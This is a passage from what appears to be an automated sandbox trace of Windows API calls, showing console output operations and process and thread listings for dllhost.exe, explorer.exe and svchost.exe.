lpNumberOfBytesWritten=0x5eeec74, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec74*=0x1, lpOverlapped=0x0) returned 1 [0144.299] GetLastError () returned 0x0 [0144.302] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0144.302] GetLastError () returned 0x0 [0144.303] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5eeec88 | out: lpConsoleScreenBufferInfo=0x5eeec88) returned 1 [0144.303] GetLastError () returned 0x0 [0144.303] GetConsoleOutputCP () returned 0x1b5 [0144.303] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.303] GetLastError () returned 0x0 [0144.306] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f [0144.306] GetLastError () returned 0x0 [0144.306] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6f, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.306] GetLastError () returned 0x0 [0144.309] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x73 [0144.309] GetLastError () returned 0x0 [0144.309] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x73, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.310] GetLastError () returned 0x0 [0144.313] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0144.313] GetLastError () returned 0x0 [0144.313] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.313] GetLastError () returned 0x0 [0144.313] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0144.313] GetLastError () returned 0x0 [0144.313] CloseHandle (hObject=0x77) returned 1 [0144.314] GetLastError () returned 0x0 [0144.316] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0144.317] GetLastError () returned 0x0 [0144.317] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.317] GetLastError () returned 0x0 [0144.317] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0144.317] GetLastError () returned 0x0 [0144.317] CloseHandle (hObject=0x77) returned 1 [0144.318] GetLastError () returned 0x0 [0144.318] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x5eeec34, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec34*=0x36, lpOverlapped=0x0) returned 1 [0144.318] GetLastError () returned 0x0 [0144.321] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0144.321] GetLastError () returned 0x0 [0144.321] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.321] GetLastError () returned 0x0 [0144.321] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0144.321] GetLastError () returned 0x0 [0144.321] CloseHandle (hObject=0x77) returned 1 [0144.322] GetLastError () returned 0x0 [0144.325] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0144.326] GetLastError () returned 0x0 [0144.326] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.326] GetLastError () returned 0x0 [0144.326] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0144.327] GetLastError () returned 0x0 [0144.327] CloseHandle (hObject=0x77) returned 1 [0144.327] GetLastError () returned 0x0 [0144.327] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5eeec74, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec74*=0x1, lpOverlapped=0x0) returned 1 [0144.327] GetLastError () returned 0x0 [0144.330] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0144.331] GetLastError () returned 0x0 [0144.331] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5eeec88 | out: lpConsoleScreenBufferInfo=0x5eeec88) returned 1 [0144.331] GetLastError () returned 0x0 [0144.331] GetConsoleOutputCP () returned 0x1b5 [0144.331] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.331] GetLastError () returned 0x0 [0144.334] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b [0144.334] GetLastError () returned 0x0 [0144.334] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7b, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.334] GetLastError () returned 0x0 [0144.337] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7f [0144.338] GetLastError () returned 0x0 [0144.338] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7f, lpConsoleScreenBufferInfo=0x5eeec28 | out: lpConsoleScreenBufferInfo=0x5eeec28) returned 1 [0144.338] GetLastError () returned 0x0 [0144.341] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0144.341] GetLastError () returned 0x0 [0144.341] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.341] GetLastError () returned 0x0 [0144.341] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0144.341] GetLastError () returned 0x0 [0144.342] CloseHandle (hObject=0x83) returned 1 [0144.342] GetLastError () returned 0x0 [0144.345] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0144.345] GetLastError () returned 0x0 [0144.345] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5eeec30 | out: lpConsoleScreenBufferInfo=0x5eeec30) returned 1 [0144.345] GetLastError () returned 0x0 [0144.345] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0144.345] GetLastError () returned 0x0 [0144.346] CloseHandle (hObject=0x83) returned 1 [0144.346] GetLastError () returned 0x0 [0144.346] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5eeec34, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec34*=0x1, lpOverlapped=0x0) returned 1 [0144.346] GetLastError () returned 0x0 [0144.349] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0144.349] GetLastError () returned 0x0 [0144.349] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.349] GetLastError () returned 0x0 [0144.350] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0144.350] GetLastError () returned 0x0 [0144.350] CloseHandle (hObject=0x83) returned 1 [0144.350] GetLastError () returned 0x0 [0144.353] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0144.353] GetLastError () returned 0x0 [0144.353] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5eeec2c | out: lpConsoleScreenBufferInfo=0x5eeec2c) returned 1 [0144.353] GetLastError () returned 0x0 [0144.354] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0144.354] GetLastError () returned 0x0 [0144.354] CloseHandle (hObject=0x83) returned 1 [0144.354] GetLastError () returned 0x0 [0144.354] WriteFile (in: hFile=0x350, lpBuffer=0x2cc8ff8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5eeec74, lpOverlapped=0x0 | out: lpBuffer=0x2cc8ff8*, lpNumberOfBytesWritten=0x5eeec74*=0x1, lpOverlapped=0x0) returned 1 [0144.355] GetLastError () returned 0x0 [0144.361] SetEvent (hEvent=0x3a0) returned 1 [0144.361] GetLastError () returned 0x0 [0144.361] SetEvent (hEvent=0x3b8) returned 1 [0144.361] GetLastError () returned 0x0 [0144.361] SetEvent (hEvent=0x3bc) returned 1 [0144.361] GetLastError () returned 0x0 [0144.361] SetEvent (hEvent=0x3dc) returned 1 [0144.361] GetLastError () returned 0x0 [0144.361] SetEvent (hEvent=0x32c) returned 1 [0144.361] GetLastError () returned 0x0 [0144.362] SetEvent (hEvent=0x3c4) returned 1 [0144.362] GetLastError () returned 0x0 [0144.362] SetEvent (hEvent=0x3c8) returned 1 [0144.362] GetLastError () returned 0x0 [0144.362] SetEvent (hEvent=0x328) returned 1 [0144.362] GetLastError () returned 0x0 [0144.362] SetEvent (hEvent=0x3cc) returned 1 [0144.362] GetLastError () returned 0x0 [0144.362] CoUninitialize () Thread: id = 243 os_tid = 0x5ac [0144.392] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0144.412] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.422] VirtualQuery (in: lpAddress=0x5eae360, lpBuffer=0x5eaf360, dwLength=0x1c | out: lpBuffer=0x5eaf360*(BaseAddress=0x5eae000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.422] VirtualQuery (in: lpAddress=0x5eae47c, lpBuffer=0x5eaf47c, dwLength=0x1c | out: lpBuffer=0x5eaf47c*(BaseAddress=0x5eae000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.426] SetEvent (hEvent=0x398) returned 1 [0144.426] GetLastError () returned 0x0 [0144.426] SetEvent (hEvent=0x39c) returned 1 [0144.426] GetLastError () returned 0x0 [0144.426] SetEvent (hEvent=0x3c0) returned 1 [0144.426] GetLastError () returned 0x0 [0144.427] SetEvent (hEvent=0x398) returned 1 [0144.427] GetLastError () returned 0x0 [0144.427] SetEvent (hEvent=0x39c) returned 1 [0144.427] GetLastError () returned 0x0 [0144.427] SetEvent (hEvent=0x3f0) returned 1 [0144.427] GetLastError () returned 0x0 [0144.427] SetEvent (hEvent=0x3e4) returned 1 [0144.427] GetLastError () returned 0x0 [0144.427] SetEvent (hEvent=0x3e8) returned 1 [0144.427] GetLastError () returned 0x0 [0144.427] SetEvent (hEvent=0x3ec) returned 1 [0144.427] GetLastError () returned 0x0 [0144.427] SetEvent (hEvent=0x3f4) returned 1 [0144.427] GetLastError () returned 0x0 [0144.427] CoUninitialize () Process: id = "14" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x6bcb1000" os_pid = "0x6a0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea31" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 246 os_tid = 0x6b4 Thread: id = 247 os_tid = 0x434 Thread: id = 248 os_tid = 0x3d4 Thread: id = 249 os_tid = 0x5c8 Thread: id = 250 os_tid = 0x5cc Thread: id = 251 os_tid = 0x378 Thread: id = 252 os_tid = 0x6cc Process: id = "15" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0xd7c000" os_pid = "0x450" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "14" os_parent_pid = "0x438" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea31" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 253 os_tid = 0x530 Thread: id = 254 os_tid = 0x53c Thread: id = 255 os_tid = 0x514 Thread: id = 256 os_tid = 0x308 Thread: id = 257 os_tid = 0x7fc Thread: id = 258 os_tid = 0x7ec Thread: id = 259 os_tid = 0x7e8 Thread: id = 260 os_tid = 0x7dc Thread: id = 261 os_tid = 0x7d8 Thread: id = 262 os_tid = 0x6fc Thread: id = 263 os_tid = 0x684 Thread: id = 264 os_tid = 0x680 Thread: id = 265 os_tid = 0x5f8 Thread: id = 266 os_tid = 0x5f0 Thread: id = 267 os_tid = 0x5e4 Thread: id = 268 os_tid = 0x5dc Thread: id = 269 os_tid = 0x59c Thread: id = 270 os_tid = 0x570 Thread: id = 271 os_tid = 0x56c Thread: id = 272 os_tid = 0x568 Thread: id = 273 os_tid = 0x528 Thread: id = 274 os_tid = 0x524 Thread: id = 275 os_tid = 0x520 Thread: id = 276 os_tid = 0x51c Thread: id = 277 os_tid = 0x518 Thread: id = 278 os_tid = 0x50c Thread: id = 279 os_tid = 0x508 Thread: id = 280 os_tid = 0x500 Thread: id = 281 os_tid = 0x4f8 Thread: id = 282 os_tid = 0x4ac Thread: id = 283 os_tid = 0x4a8 Thread: id = 284 os_tid = 0x49c Thread: id = 285 os_tid = 0x498 Thread: id = 286 os_tid = 0x494 Thread: id = 287 os_tid = 0x45c Thread: id = 288 os_tid = 0x454 Thread: id = 291 os_tid = 0x7e0 Thread: id = 309 os_tid = 0x764 Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xc63f000" os_pid = "0x2c4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b774" [0xc000000f], "LOCAL" [0x7] Thread: id = 319 os_tid = 0x364 Thread: id = 320 os_tid = 0x1e4 Thread: id = 321 os_tid = 0x158 Thread: id = 322 os_tid = 0x59c Thread: id = 323 os_tid = 0x4fc Thread: id = 324 os_tid = 0x7e4 Thread: id = 325 os_tid = 0x614 Thread: id = 326 os_tid = 0x5f4 Thread: id = 327 os_tid = 0x5e0 Thread: id = 328 os_tid = 0x5a8 Thread: id = 329 os_tid = 0x594 Thread: id = 330 os_tid = 0x264 Thread: id = 331 os_tid = 0x1c0 Thread: id = 332 os_tid = 0x174 Thread: id = 333 os_tid = 0x15c Thread: id = 334 os_tid = 0x3c0 Thread: id = 335 os_tid = 0x3b8 Thread: id = 336 os_tid = 0x3a8 Thread: id = 337 os_tid = 0x2fc Thread: id = 338 os_tid = 0x2f8 Thread: id = 339 os_tid = 0x2d4 Thread: id = 340 os_tid = 0x2c8